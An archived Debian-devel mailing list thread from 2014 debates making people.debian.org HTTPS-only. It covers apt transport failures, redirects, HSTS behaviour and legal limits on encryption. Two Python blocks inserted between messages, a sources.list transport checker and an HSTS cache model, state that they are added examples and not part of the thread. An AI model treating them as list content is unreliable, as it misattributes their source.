Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Thu, Jul 31, 2014 at 01:26:09PM +0200, Jakub Wilk wrote:
> * Jakub Wilk jw...@debian.org, 2014-07-30, 22:26:
> > WARNING: The following packages cannot be authenticated!
> >   apt-transport-https
> > Install these packages without verification? [y/N]
> > E: Some packages could not be authenticated
> [...]
> > But if the authentication troubles are really related to the HTTP-HTTPS
> > switch, then it's a bug in apt that should be fixed.
>
> Filed as #756614.

Thanks for looking into this.

There is also a minor problem when used from wheezy; putting it here so it gets indexed and is more available to web searches.

Using wheezy apt 0.9.7.9 in a wheezy box:

  # apt-get update
  ...
  Err http://people.debian.org ./ Packages
    301 Moved Permanently [IP: 5.153.231.30 80]
  ...
  # apt-get install apt-transport-https
  ...
  Setting up apt-transport-https (0.9.7.9+deb7u2) ...
  # apt-get update
  Err http://people.debian.org ./ Packages
    301 Moved Permanently [IP: 5.153.231.30 80]

Changing http://people.debian.org to https://people.debian.org fixes the problem, once apt-transport-https is installed. Not a big problem; I do not think this is worth a new bug report.

-- 
Agustin

-- 
To UNSUBSCRIBE, email to debian-devel-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: https://lists.debian.org/20140901162037.ga7...@agmartin.aq.upm.es
Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Jakub Wilk jw...@debian.org, 2014-07-30, 22:26:
> WARNING: The following packages cannot be authenticated!
>   apt-transport-https
> Install these packages without verification? [y/N]
> E: Some packages could not be authenticated
[...]
> But if the authentication troubles are really related to the HTTP-HTTPS switch, then it's a bug in apt that should be fixed.

Filed as #756614.

-- 
Jakub Wilk

Archive: https://lists.debian.org/20140731112609.ga7...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Agustin Martin agmar...@debian.org, 2014-07-28, 13:06:
> This can actually lead to a weird behavior for users. In a system having something under people.debian.org in apt sources.list and apt-transport-https not installed, in today's testing upgrade,
>
> $ sudo apt-get update
> [...]
> E: The method driver /usr/lib/apt/methods/https could not be found.
> N: Is the package apt-transport-https installed?
> $ sudo apt-get install apt-transport-https
> Reading package lists... Done
> Building dependency tree
> Reading state information... Done
> The following NEW packages will be installed:
>   apt-transport-https
> 0 upgraded, 1 newly installed, 0 to remove and 275 not upgraded.
> Need to get 132 kB of archives.
> After this operation, 221 kB of additional disk space will be used.
> WARNING: The following packages cannot be authenticated!
>   apt-transport-https
> Install these packages without verification? [y/N]
> E: Some packages could not be authenticated

I can't reproduce it here. I do get the “method driver /usr/lib/apt/methods/https could not be found” error message. But, as one would expect, it doesn't have any effect on authentication of the packages from the main archive.

But if the authentication troubles are really related to the HTTP-HTTPS switch, then it's a bug in apt that should be fixed.

-- 
Jakub Wilk

Archive: https://lists.debian.org/20140730202607.ga6...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
* Jakub Wilk jw...@debian.org, 2014-07-30, 22:26:
> * Agustin Martin agmar...@debian.org, 2014-07-28, 13:06:
> > This can actually lead to a weird behavior for users. In a system having something under people.debian.org in apt sources.list and apt-transport-https not installed, in today's testing upgrade,
> >
> > $ sudo apt-get update
> > [...]
> > E: The method driver /usr/lib/apt/methods/https could not be found.
> > N: Is the package apt-transport-https installed?
> > $ sudo apt-get install apt-transport-https
> > Reading package lists... Done
> > Building dependency tree
> > Reading state information... Done
> > The following NEW packages will be installed:
> >   apt-transport-https
> > 0 upgraded, 1 newly installed, 0 to remove and 275 not upgraded.
> > Need to get 132 kB of archives.
> > After this operation, 221 kB of additional disk space will be used.
> > WARNING: The following packages cannot be authenticated!
> >   apt-transport-https
> > Install these packages without verification? [y/N]
> > E: Some packages could not be authenticated
>
> I can't reproduce it here.

Scratch that. I reproduced it. Sorry for the noise.

-- 
Jakub Wilk

Archive: https://lists.debian.org/20140730202924.gb6...@jwilk.net
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Tue, Jul 15, 2014 at 02:00:12PM +, Thorsten Glaser wrote:
> Dixi quod…
>
> > Martin Zobel-Helas dixit:
> > > Furthermore, we will change the people.debian.org web-service such that only HTTPS connections will be supported (unencrypted requests will be redirected).
> > > […]
> > > Take it as a heads-up to maybe move stuff elsewhere, if it needs http (e.g. APT repos work well via http since they use PGP for signatures).
> >
> > Actually, this will break most DDs' APT repositories because apt-transport-https is usually not installed.

This can actually lead to a weird behavior for users. In a system having something under people.debian.org in apt sources.list and apt-transport-https not installed, in today's testing upgrade,

  $ sudo apt-get update
  [...]
  E: The method driver /usr/lib/apt/methods/https could not be found.
  N: Is the package apt-transport-https installed?
  $ sudo apt-get install apt-transport-https
  Reading package lists... Done
  Building dependency tree
  Reading state information... Done
  The following NEW packages will be installed:
    apt-transport-https
  0 upgraded, 1 newly installed, 0 to remove and 275 not upgraded.
  Need to get 132 kB of archives.
  After this operation, 221 kB of additional disk space will be used.
  WARNING: The following packages cannot be authenticated!
    apt-transport-https
  Install these packages without verification? [y/N]
  E: Some packages could not be authenticated

Commenting out the people.debian.org entry leads to a successful

  $ sudo apt-get update
  $ sudo apt-get install apt-transport-https

and the people.debian.org entry can then be re-enabled. But normal users having such entries (fortunately not many) will be puzzled by the problem.

Regards,

-- 
Agustin

Archive: https://lists.debian.org/20140728110647.ga22...@agmartin.aq.upm.es
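The chicken-and-egg failure above (an https:// source entry, no https method driver, so apt-get update stops before apt-transport-https can be fetched) can be caught before an entry is switched. Added example, not code from the thread or from apt: it parses one-line sources.list entries and compares each URI scheme against the drivers in /usr/lib/apt/methods (the apt 0.9.x layout the thread uses); the sample sources.list and the ~someone repository path are constructed placeholders.

```python
"""Pre-flight check: does every sources.list transport have a method driver?

Added example, not apt's own code. Assumes apt's one-line source format and
the /usr/lib/apt/methods/<scheme> driver layout (apt 0.9.x, as in the thread).
"""
import os
import re
from urllib.parse import urlsplit

DEFAULT_METHODS_DIR = "/usr/lib/apt/methods"

# deb|deb-src [options] uri suite [components...]; the options block is optional.
_ENTRY_RE = re.compile(
    r"^\s*(?P<type>deb|deb-src)\s+(?:\[(?P<opts>[^\]]*)\]\s+)?(?P<uri>\S+)\s+\S+"
)

# Constructed sample, not a real system's sources.list; ~someone is a placeholder.
SAMPLE_SOURCES = """\
# constructed example
deb http://ftp.debian.org/debian wheezy main
deb-src http://ftp.debian.org/debian wheezy main
deb [arch=amd64] https://people.debian.org/~someone/repo ./
"""


def parse_sources(text):
    """Return (type, uri, scheme) for every active entry in sources.list text.

    Comment and blank lines are skipped. A malformed line raises ValueError
    instead of being ignored, so a typo cannot masquerade as 'nothing to do'.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = _ENTRY_RE.match(line)
        if not m:
            raise ValueError("line %d: not a sources.list entry: %r" % (lineno, raw))
        scheme = urlsplit(m.group("uri")).scheme.lower()
        if not scheme:
            raise ValueError("line %d: URI has no scheme: %r" % (lineno, m.group("uri")))
        entries.append((m.group("type"), m.group("uri"), scheme))
    return entries


def installed_transports(methods_dir=DEFAULT_METHODS_DIR):
    """Set of schemes apt can fetch: one executable per scheme in methods_dir."""
    if not os.path.isdir(methods_dir):
        return set()
    return {name for name in os.listdir(methods_dir)
            if os.access(os.path.join(methods_dir, name), os.X_OK)}


def missing_transports(text, available=None, methods_dir=DEFAULT_METHODS_DIR):
    """Map each scheme that has no driver to the URIs that need it.

    `available` lets a caller supply the scheme set directly (used by tests);
    by default it is read from methods_dir. An empty result means apt-get
    update will not stop with "method driver ... could not be found".
    """
    if available is None:
        available = installed_transports(methods_dir)
    missing = {}
    for _, uri, scheme in parse_sources(text):
        if scheme not in available:
            missing.setdefault(scheme, []).append(uri)
    return missing


def advice(missing):
    """One line per missing scheme; the https case names the package from the thread."""
    lines = []
    for scheme, uris in sorted(missing.items()):
        if scheme == "https":
            fix = "install apt-transport-https *before* switching these entries to https://"
        else:
            fix = "no driver for this scheme; check that its transport package is installed"
        count = "%d entr%s" % (len(uris), "y" if len(uris) == 1 else "ies")
        lines.append("%s: %s (%s)" % (scheme, count, fix))
    return lines


if __name__ == "__main__":
    problems = missing_transports(SAMPLE_SOURCES)
    for line in advice(problems):
        print(line)
    if not problems:
        print("all transports in the sample sources.list are available")
```

Run it on the real file with `missing_transports(open("/etc/apt/sources.list").read())` to see whether the box will hit the error before the https:// entry is enabled.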
Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi!

On Mon, 2014-07-21 at 19:44:18 +0200, Jakub Wilk wrote:
> * Peter Palfrader wea...@debian.org, 2014-07-20, 12:07:
> > we have been moving towards https for most services over the last 12 months.
>
> Is it intentional that the http-https redirect for bugs.d.o is only temporary (302)? Should we update devscripts and python-debianbts to use HTTPS for accessing this host?

I already had a queued patch to switch the remaining URLs in dpkg, like the one in the patch header template, to use https. Will try to push tomorrowish. I guess updating other packages/tools would make sense, indeed.

Thanks,
Guillem

Archive: https://lists.debian.org/20140724014911.ga6...@gaara.hadrons.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, 21 Jul 2014, Jakub Wilk wrote:
> * Peter Palfrader wea...@debian.org, 2014-07-20, 12:07:
> > we have been moving towards https for most services over the last 12 months.
>
> Is it intentional that the http-https redirect for bugs.d.o is only temporary (302)?

302 often is the default, and at least when changing configs it's a lot more forgiving to mistakes than 301. And then nobody changes it. We probably have a zoo of 301s and 302s all over.

> Should we update devscripts and python-debianbts to use HTTPS for accessing this host?

It's not entirely clear which host you mean by this, but if it's bugs then I'd say yes. If it's something else that sends HSTS headers, then also yes. If it's something else entirely, ask again?

> Do you plan to enable HTTPS on incoming.d.o and lintian.d.o?

Lintian is now done. We haven't thought about incoming.debian.org yet - it seems a bit of a strange thing anyway. Who uses that right now, with no obvious means at all to verify the authenticity of binary packages?

Cheers,
-- 
Peter Palfrader
http://www.palfrader.org/

Archive: https://lists.debian.org/20140724055825.gh23...@anguilla.noreply.org
Re: people.debian.org redirecting browsers to HTTPS (was: people.debian.org will move from ravel to paradis and become HTTPS only)
On 07/21/2014 12:19 AM, Peter Palfrader wrote:
> On Sun, 20 Jul 2014, Wouter Verhelst wrote:
> > These are all good arguments for enabling HTTPS and making it the default (which I've said repeatedly is a move that I support, or at the very least don't oppose), but not for *disabling* the possibility of plain HTTP.
>
> Pray tell: How do you make it default.
>
> > - Enable HSTS on the domain
> > - Run sed -i -e 's,http://people.debian.org,https://people.debian.org,g' over a webwml export.
> > - Create a robots.txt file which is visible from the HTTP export (but not from the HTTPS one) which looks like this:
>
> None of these brings people who type in people.debian.org into their browser to https.

This could be achieved with mod_rewrite and parsing the user agent:

  RewriteEngine on
  RewriteCond %{HTTP_USER_AGENT} ^SomeBrowser/(.*)$
  RewriteRule ^(.*)$ https://test.domain.com/$1 [L,R=302]

This could be implemented in the vhost directive, and makes HTTPS mandatory for the user agent SomeBrowser, HTTP being effectively not reachable for it.

Thomas Goirand (zigo)

Archive: https://lists.debian.org/53ccb2bb.6050...@debian.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sunday 20 July 2014 21:22:48, Peter Palfrader wrote:
> On Sun, 20 Jul 2014, Wouter Verhelst wrote:
> > If HSTS is enabled and you access people.debian.org even once (and you don't clear out their entire cache for as long as the HSTS timeout lives), then HSTS will ensure that the HTTP URL gets turned into an HTTPS URL automatically.
>
> Alas, no.

Yes it does.

I just tried chromium and iceweasel on this laptop (running sid, a few days out of date). Both will turn "http://www.debian.org" into "https://www.debian.org" due to HSTS. This works whether I enter the "http://" prefix or not.

Are you talking about something else? If so, can you clarify in more than two words?

-- 
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26

Archive: https://lists.debian.org/2893596.xwzrmzo...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Sun, July 20, 2014 21:34, Steve Langasek wrote:
> Because it's not an improvement to the service; it's a change that makes the *service* to Debian developers worse, for political reasons.

I don't agree that it gets worse or that it is for political reasons, but even if it were, it being political does not make the reason bad per se.

> Telling DDs "you can just host the files on your own server" is missing the point of why people.debian.org exists in the first place.

Well, why does it exist in the first place? Maybe it would help if we had a clear idea of what the reason is that we offer this service. What do we expect people to use, or not use, it for? The project does not need to facilitate each and every thing any DD can dream up - it needs to provide those things that help develop Debian. I use project resources to work on developing our OS; I expect our services to be considerate of that use case but do not expect them to facilitate anything else.

The use case broken by this change is preseeding installs over plain http from a server somewhere on the internet. I find it doubtful whether this would be something we need to be facilitating as a project.

Thijs

Archive: https://lists.debian.org/9b7de801d87fd3022b628591f9c54dd5.squir...@aphrodite.kinkhorst.nl
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 21, 2014 at 5:22 PM, Wouter Verhelst wrote:
> Yes it does.

No...

> I just tried chromium and iceweasel on this laptop (running sid, a few days out of date). Both will turn "http://www.debian.org" into "https://www.debian.org" due to HSTS. This works whether I enter the "http://" prefix or not.

http://www.debian.org/ does not deliver the HSTS header so it definitely isn't HSTS causing this upgrade to https.

  pabs@chianamo ~ $ wget http://www.debian.org/ -SO /dev/null 2>&1 | grep Sec
  pabs@chianamo ~ $ wget https://www.debian.org/ -SO /dev/null 2>&1 | grep Sec
    Strict-Transport-Security: max-age=5184000

-- 
bye,
pabs

https://wiki.debian.org/PaulWise

Archive: https://lists.debian.org/caktje6gsnan41yhr_ge8_mr7oo_8gtf3zlzv-tnuxycucqc...@mail.gmail.com
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Monday 21 July 2014 17:39:44, Paul Wise wrote:
> On Mon, Jul 21, 2014 at 5:22 PM, Wouter Verhelst wrote:
> > Yes it does.
>
> No...
>
> > I just tried chromium and iceweasel on this laptop (running sid, a few days out of date). Both will turn "http://www.debian.org" into "https://www.debian.org" due to HSTS. This works whether I enter the "http://" prefix or not.
>
> http://www.debian.org/ does not deliver the HSTS header so it definitely isn't HSTS causing this upgrade to https.

Oh, I see the misunderstanding now.

What I meant is, if you access people.debian.org over HTTPS even once.

If you clear your cache (or do the "forget this site" thing in browsing history) and then explicitly enter the HTTP URL, then you asked for HTTP and it shouldn't be changed behind your back -- that would be a feature, not a bug.

If you don't clear your cache after accessing people.debian.org through https, then HSTS will turn http into https until the HSTS max-age time has passed.

-- 
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26

Archive: https://lists.debian.org/15147779.p75vczu...@grep.be
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, 21 Jul 2014, Wouter Verhelst wrote:
> On Sunday 20 July 2014 21:22:48, Peter Palfrader wrote:
> > On Sun, 20 Jul 2014, Wouter Verhelst wrote:
> > > If HSTS is enabled and you access people.debian.org even once (and you don't clear out their entire cache for as long as the HSTS timeout lives), then HSTS will ensure that the HTTP URL gets turned into an HTTPS URL automatically.
> >
> > Alas, no.
>
> Yes it does.
>
> I just tried chromium and iceweasel on this laptop (running sid, a few days out of date). Both will turn "http://www.debian.org" into "https://www.debian.org" due to HSTS. This works whether I enter the "http://" prefix or not.
>
> Are you talking about something else? If so, can you clarify in more than two words?

Sure, I can clarify:

As I understand the RFC, servers MUST NOT send HSTS headers on insecure connections. Similarly, clients MUST ignore HSTS headers on insecure connections such as plain text http or if they can't validate the cert.

This means that HSTS is not capable of upgrading an initial http-only connection to https. (Clients will only turn your request into https if they had previously connected via https and cached the HSTS information.)

Cheers,
-- 
Peter Palfrader
http://www.palfrader.org/

Archive: https://lists.debian.org/20140721093449.gf...@anguilla.noreply.org
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Monday 21 July 2014 11:34:53, Thijs Kinkhorst wrote:
> On Sun, July 20, 2014 21:34, Steve Langasek wrote:
> > Because it's not an improvement to the service; it's a change that makes the *service* to Debian developers worse, for political reasons.
>
> I don't agree that it gets worse

You're no longer serving those who need to provide an HTTP-only link, for whatever reason. By any definition I can think of, that means you're doing less, which implies you're providing less service.

> or that it is for political reasons, but even if it were, it being political does not make the reason bad per se.

It is if there are technical arguments against the change (there are) and there are no technical arguments in favour of the change (there aren't).

> The use case broken by this change is preseeding installs over plain http from a server somewhere on the internet. I find it doubtful whether this would be something we need to be facilitating as a project.

If it is a set of preseed files to allow installing machines on one particular corporate network? Not so much. On the other hand, if it is a set of preseed files that change the answers of some low-priority questions (which are not ordinarily shown to the user installing a machine) so that the default behaviour of d-i changes without changing the fundamental functionality? That could be something a Debian Developer might want to provide as a service to our users, and that would require some HTTP-only webspace, preferably under the debian.org domain.

One example of such a scenario would be a preseed file that preseeds the answer of passwd/make-user to false, and ensures that libnss-ldap or something similar is installed on the resulting system. This would greatly simplify installing machines without local users.

Having said that, it is a fallacy to assume that just because only one example has been given, that one example is the only use case that we should consider. Here are a few others:

- A company's ISP can't provide them with the bandwidth they need, so they install a transparent caching proxy to reduce bandwidth needs (this isn't specific to people.d.o, but that doesn't make it less valid). Transparently caching HTTPS is much more complex than transparently caching HTTP.
- Someone broke OpenSSL (again) so that https downloads are broken, and the maintainer puts a (gpg-signed) patch up on their people.d.o space (or posts a message to a mailing list; but lists.debian.org already is https-only apparently, so that doesn't help for people who aren't subscribed).
- You are somewhere with extremely bad connectivity (say, in Wall Street during rush hour) where you need to look up/review some documentation before a meeting, and your SSL connections keep timing out.
- You want to download a large file that is provided along with an md5sum and a GnuPG signature onto a resource-strapped device (say, a raspberry pi) which can't decrypt at link speed, and you don't like waiting.

Need more? I can come up with more, but that would be missing the point.

The point isn't that we should continue supporting HTTP because scenario X, Y, or Z. The point is that we should continue supporting HTTP because it doesn't buy us anything not to, while it may cost our users and our developers something they could do beforehand but can't do right now anymore.

If you can come up with a scenario where an attack on the *project* would be prevented by providing an HTTPS-only people.debian.org, *then* I would agree that disabling HTTP is a good move. But I don't think that it's possible to come up with such a scenario, simply because you're providing static files which anyone can download. The only security benefit to be had is at the client side.

In fact, due to the fact that TLS is a complex protocol which uses a number of rather complex algorithms, there's a lot that can go wrong with security in TLS which can't go wrong with plain HTTP, and which would *reduce* the security of the project. That this isn't just a hypothetical scenario is proven by the heartbleed bug of a few months ago.

As with any security-related choice, choosing between HTTP and HTTPS involves a trade-off of features and convenience versus security. In most cases, security should win out, and for that reason I agree that making HTTPS the default (insofar as that is possible) could be a good thing to do. However, since the only security benefit to be had in enabling HTTPS for static files is at the client side, I think it's only fair to *allow* the client to make that tradeoff and decide that in this one particular case, disabling HTTPS is the right thing to do.

By redirecting all HTTP requests to HTTPS, you're denying clients that choice, and thus are reducing the level of service that you provide them.

-- 
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26
Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Monday 21 July 2014 11:34:49, Peter Palfrader wrote:
> On Mon, 21 Jul 2014, Wouter Verhelst wrote:
> > Are you talking about something else? If so, can you clarify in more than two words?
>
> Sure, I can clarify:
>
> As I understand the RFC, servers MUST NOT send HSTS headers on insecure connections. Similarly, clients MUST ignore HSTS headers on insecure connections such as plain text http or if they can't validate the cert.
>
> This means that HSTS is not capable of upgrading an initial http-only connection to https. (Clients will only turn your request into https if they had previously connected via https and cached the HSTS information.)

Yes, that's my understanding too. As I've said in my reply to Paul's mail, what I meant is that if a user has seen an HSTS header even once, then my statement is true.

As such, what you need is to improve the likelihood that the initial connection is an https one, not an http-only one. I do think that the things I've suggested (instruct search engines to ignore http, only provide https links from project resources, etc) will increase that likelihood to the extent that http-only connections will be a rare exception. You can probably increase it even more with some effort, I'm sure.

Is that enough? That's a matter of opinion. I would think it is.

-- 
It is easy to love a country that is famous for chocolate and beer
  -- Barack Obama, speaking in Brussels, Belgium, 2014-03-26

Archive: https://lists.debian.org/8110293.d4xlpoy...@grep.be
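The client-side rules Peter summarises (an STS header counts only over validated HTTPS, is ignored over plain http, and rewrites http:// to https:// until max-age runs out) explain both Paul's wget check, which sees no header on the http:// URL, and Wouter's browsers, which had already cached the header from an https:// visit. Added example, not code from the thread or from any browser, modelling those rules: responses are constructed header dicts, and `now` is passed in as an integer so expiry can be exercised offline.

```python
"""Model of a client's HSTS cache following the RFC 6797 rules quoted above.

Added example, not browser code. Header names are lowercase dict keys as a
client would normalise them; `now` is a plain integer timestamp.
"""
import re
from urllib.parse import urlsplit, urlunsplit

_MAX_AGE_RE = re.compile(r'(?:^|;)\s*max-age\s*=\s*"?(\d+)"?', re.IGNORECASE)
_INCLUDE_SUB_RE = re.compile(r"(?:^|;)\s*includeSubDomains\s*(?:;|$)", re.IGNORECASE)


def parse_sts(value):
    """Return (max_age_seconds, include_subdomains), or None if malformed.

    max-age is mandatory; a header without it is treated as if it were absent.
    """
    m = _MAX_AGE_RE.search(value)
    if not m:
        return None
    return int(m.group(1)), _INCLUDE_SUB_RE.search(value) is not None


class HstsCache:
    """The per-client 'known HSTS hosts' store a browser keeps."""

    def __init__(self):
        self._known = {}  # host -> (expires_at, include_subdomains)

    def process_response(self, url, headers, now, cert_valid=True):
        """Note the host only if the STS header arrived over secure transport.

        Returns True when the host was added or refreshed, False when ignored.
        """
        parts = urlsplit(url)
        if parts.scheme != "https" or not cert_valid:
            return False  # plain http, or https with a cert we cannot validate
        value = headers.get("strict-transport-security")
        if value is None:
            return False
        parsed = parse_sts(value)
        if parsed is None:
            return False
        max_age, include_sub = parsed
        if max_age == 0:
            self._known.pop(parts.hostname, None)  # max-age=0 tells clients to forget the host
            return False
        self._known[parts.hostname] = (now + max_age, include_sub)
        return True

    def is_known(self, host, now):
        """Exact match, or a parent noted with includeSubDomains; expired entries do not count."""
        labels = host.split(".")
        for i in range(len(labels)):
            entry = self._known.get(".".join(labels[i:]))
            if entry is None:
                continue
            expires_at, include_sub = entry
            if now < expires_at and (i == 0 or include_sub):
                return True
        return False

    def rewrite(self, url, now):
        """URL the client actually fetches: http:// becomes https:// for known hosts."""
        parts = urlsplit(url)
        if parts.scheme != "http" or not self.is_known(parts.hostname, now):
            return url
        # Port 80 maps to the https default; an explicit other port is kept as-is.
        netloc = parts.hostname if parts.port in (None, 80) else "%s:%d" % (parts.hostname, parts.port)
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    cache = HstsCache()
    # Paul's observation: the http:// response carries no STS header at all.
    cache.process_response("http://www.debian.org/", {"server": "Apache"}, now=0)
    print(cache.rewrite("http://www.debian.org/", now=1))            # unchanged
    # The https:// response does (max-age=5184000 as in the thread); from then
    # on the client upgrades typed http:// URLs itself, until max-age runs out.
    cache.process_response("https://www.debian.org/",
                           {"strict-transport-security": "max-age=5184000"}, now=1)
    print(cache.rewrite("http://www.debian.org/", now=2))            # https://www.debian.org/
    print(cache.rewrite("http://www.debian.org/", now=1 + 5184000))  # back to http://
```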
myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi Iain,

On Sunday, 20 July 2014, Iain R. Learmonth wrote:
> The main one is that there are places in the world you just can't use HTTPS for legal reasons [...]

I'm curious, can you name one?

cheers,
Holger
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 21, 2014 at 01:12:37PM +0200, Holger Levsen wrote:
> Hi Iain,
>
> On Sunday, 20 July 2014, Iain R. Learmonth wrote:
> > The main one is that there are places in the world you just can't use HTTPS for legal reasons [...]
>
> I'm curious, can you name one?

The United Kingdom when using IPv4 over AX.25 on Amateur Radio. Encryption is illegal because it goes against the self-policing nature of the amateur bands.

(I was hoping to actually locate one of the crackpot dictator countries that have laws for the general population but there doesn't actually seem to be much data available on that).

http://www.ru.j-npcs.org/usoft/WWW/www_debian.org/Documentation/policy.html/ch-developer.html

Note that for packaging, these allowances are made. I do not see why we cannot make the same allowances for accessing a website.

Iain.

-- 
e: i...@fsfe.org  w: iain.learmonth.me
x: i...@jabber.fsfe.org  t: +447875886930
c: MM6MVQ  g: IO87we
p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi,

On Monday, 21 July 2014, Iain R. Learmonth wrote:
> The United Kingdom when using IPv4 over AX.25 on Amateur Radio. Encryption is illegal because it goes against the self-policing nature of the amateur bands.

and so probably are prison inmates, workers in the armed forces and others who might be legally bound by work contracts. IMO not really a compelling argument for the rest of the world.

> http://www.ru.j-npcs.org/usoft/WWW/www_debian.org/Documentation/policy.html/ch-developer.html
>
> Note that for packaging, these allowances are made. I do not see why we cannot make the same allowances for accessing a website.

that policy copy you are referring to states "version 2.1.2.2 (dpkg 1.4.0.5), 5 December 1996" in the footer, while we currently use version 3.9.5.0, 2013-10-28, and, yes, the world has changed.

cheers,
Holger
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 7/21/14, Holger Levsen hol...@layer-acht.org wrote:
> Hi Iain,
>
> On Sunday, 20 July 2014, Iain R. Learmonth wrote:
> > The main one is that there are places in the world you just can't use HTTPS for legal reasons [...]
>
> I'm curious, can you name one?

I'm also curious - is there a Debian developer who will not use HTTPS but does use SSH to access servers? Is Debian still offering telnet services too? What other unsafe protocols are standard and in use?

All the best,
Jacob

Archive: https://lists.debian.org/cafggdf2pnzk17uzkfh-hekv2-kyvxh9+qihvzltgmdtjrrr...@mail.gmail.com
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 7/21/14, Iain R. Learmonth i...@fsfe.org wrote:
> On Mon, Jul 21, 2014 at 01:12:37PM +0200, Holger Levsen wrote:
> > Hi Iain,
> >
> > On Sunday, 20 July 2014, Iain R. Learmonth wrote:
> > > The main one is that there are places in the world you just can't use HTTPS for legal reasons [...]
> >
> > I'm curious, can you name one?
>
> The United Kingdom when using IPv4 over AX.25 on Amateur Radio. Encryption is illegal because it goes against the self-policing nature of the amateur bands.

I believe you are mistaken. My understanding is that you're not supposed to use crypto on the radio layer and IP packets are already several layers away from that concern. It would be great to hear from a HAM radio literate lawyer on this topic. Perhaps someone can ask the EFF if it is actually an important sticking point?

More importantly, I suspect, would be to first ask if anyone in the UK uses IPv4 over AX.25 to access people.debian.org?

> (I was hoping to actually locate one of the crackpot dictator countries that have laws for the general population but there doesn't actually seem to be much data available on that).

Isn't any country that outlaws use of crypto by free people by definition a crackpot country? :-)

All the best,
Jacob

Archive: https://lists.debian.org/cafggdf0p5nqvjvmkhysrpr81kuurhsvsvas_d22wpvwewrp...@mail.gmail.com
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 21, 2014, at 13:12, Holger Levsen wrote:
> Hi Iain,
>
> On Sunday, 20 July 2014, Iain R. Learmonth wrote:
> > The main one is that there are places in the world you just can't use HTTPS for legal reasons [...]
>
> I'm curious, can you name one?

http://en.wikipedia.org/wiki/Restrictions_on_the_import_of_cryptography

And http://www.cryptolaw.org/cls2.htm

The usual suspects: Belarus, Iran, Saudi Arabia (and I guess North Korea, but the use of crypto is probably OK if you are allowed to use a computer and connect to outside of the world anyway...)

But again this should not be a reason to not deploy encryption everywhere. The current problem with HTTPS is that it bundles encryption with authenticity. This needs to be unbundled[1]. My opinion is that even a transparent opportunistic encryption (f.e. like the DANE implementation in postfix) would improve the overall state of security.

1. I must admit that I haven't been able to monitor httpbis progress on this topic.

Ondrej
-- 
Ondřej Surý ond...@sury.org
Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server

Archive: https://lists.debian.org/1405949524.7249.143937105.648e1...@webmail.messagingengine.com
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
Hi Jacob,

On Mon, Jul 21, 2014 at 01:14:14PM +, Jacob Appelbaum wrote:
> I believe you are mistaken. My understanding is that you're not supposed to use crypto on the radio layer and IP packets are already several layers away from that concern. It would be great to hear from a HAM radio literate lawyer on this topic. Perhaps someone can ask the EFF if it is actually an important sticking point?

I am not a lawyer but I am a radio amateur. Here is a link to the Ofcom Amateur Radio terms:

https://services.ofcom.org.uk/amateur-terms.pdf

  11(2) The Licensee shall only address Messages to other Amateurs or to the stations of those Amateurs and shall not encrypt these Messages for the purpose of rendering the Message unintelligible to other radio spectrum users.

I would take this to mean that no part of the message can be encrypted.

> More importantly, I suspect, would be to first ask if anyone in the UK uses IPv4 over AX.25 to access people.debian.org?

This is not beyond the realm of possibility. It would be permitted by the Ofcom terms to download Amateur Radio software from p.d.o and also to browse Amateur Radio software documentation hosted there, which are both things that the Debian policy would permit to be hosted.

There are likely also other cases, which granted are likely edge cases, where encryption cannot be used.

> Isn't any country that outlaws use of crypto by free people by definition a crackpot country? :-)

Indeed.

Iain.

-- 
e: i...@fsfe.org  w: iain.learmonth.me
x: i...@jabber.fsfe.org  t: +447875886930
c: MM6MVQ  g: IO87we
p: 1F72 607C 5FF2 CCD5 3F01 600D 56FF 9EA4 E984 6C49
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On Mon, Jul 21, 2014 at 9:32 PM, Ondřej Surý wrote:
> The current problem with HTTPS is that it bundles encryption with authenticity. This needs to be unbundled[1]. My opinion is that even a transparent opportunistic encryption (f.e. like DANE implementation in postfix) would improve the overall state of security.

The closest thing appears to be https-finder+https-everywhere+tor:

https://packages.debian.org/sid/xul-ext-https-finder
https://packages.debian.org/sid/xul-ext-https-everywhere
https://packages.debian.org/sid/torbrowser-launcher

--
bye,
pabs

https://wiki.debian.org/PaulWise

Archive: https://lists.debian.org/CAKTje6Eb5Dr+0ADbNROE2i=NvyNj6bVGxBHJX050fH=peks...@mail.gmail.com
Re: myth(?): places in the world where https is illegal? Re: people.debian.org will move from ravel to paradis and become HTTPS only
On 7/21/14, Iain R. Learmonth i...@fsfe.org wrote:
